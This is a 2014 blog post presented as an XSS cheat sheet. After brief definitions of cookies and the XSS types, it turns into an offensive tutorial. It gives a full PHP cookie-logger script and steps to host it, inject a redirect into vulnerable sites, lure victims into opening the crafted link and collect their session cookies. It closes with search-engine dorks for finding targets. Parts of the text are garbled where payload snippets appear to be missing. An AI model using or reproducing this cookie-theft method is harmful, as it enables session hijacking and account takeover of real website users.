Monday, April 21, 2014

XSS cheat sheet by Gorvam saddar

XSS cheat sheet



Before we start what is XSS? let's come to basic !! hmm what is cookie , don't say something like eating stuff.
COOKIE:
A cookie is the variable that web-browsers use to store your login credentials. Without a cookie, you cannot "stay logged in" on websites.
CROSS SITE SCRIPTING:
Cross-Site Scripting is the process of injecting JavaScript (mainly) and also HTML into a webpage.

SOME POINTS ON XSS :
@ -XSS attacks almost always focus upon sites which use cookies for storing our username and password.
@-XSS is used to harm the website (may be defacing ).
tRAdiTIOnAL Type$: type0 , type1, type2

type 0 =DOM-based:

DOM-based is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the slave’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.

type 1 = Non Persistence :

It means that the injected code is not permanent and is for small time till the user is on page or having the url with malicious code.
type 2 = Persistence :

It means that the injected code is permanent and will stay on the site and output can be seen by any user of site.

Now the question is how to check whether the site is xss vulnerable or not ?
There are two methods to check this:

1.POST::

http://www.target.com/search.php ( we put malacious code in search engine)

2.GET :

http://www.target.com/search=
We directly put the script in url of browser

 what else we can do ..??
-->Insert image:
 src=“url of the image>
-->Insert message:
this is hacked
-->Redirect to your page :

But main aim of xss is to steal cookies so here is cookie stealing.
COOKIE STEALING TUTORIAL:

php

function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie
"
);
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
    fclose($log);
}

logData();

?>

now how to use this code???
This is done by three-step process consisting of the injected script, the cookie recorder, and the log file.

First you'll need to get an account on a server and create two files, log.txt and giveyourname.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (give your name.php) [code metion above].
above script will record the cookies of every user that views it.
now above code is injected to the xss vulnerable site page via get or post method: what does this code do??
The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened.


If this code works then you'll automatically gets the cookie in yoursite, other wise you have to do some hard work !! grab the link which you get after the insertion of above script. And manually get someone to use that link if necessary. o0ps all s done at this point.

##All you need to do now is go to your website and check the log file

YOU CAN TRY TO LOOK HERE =
SEARCH BOX
SHOUT BOX
BLOGS
COMMENT BOX
LOGIN BOX
FEEDBACK FORMS

Hey there are still so many xss vulnerable sites , the thing is you should spent maximum time on internet in search for them:
here are few dorks for you:
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
/preaspjobboard//Employee/emp_login.asp?msg1=
pages/match_report.php?mid= pages/match_report.php?mid=
inurl:?msg=

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.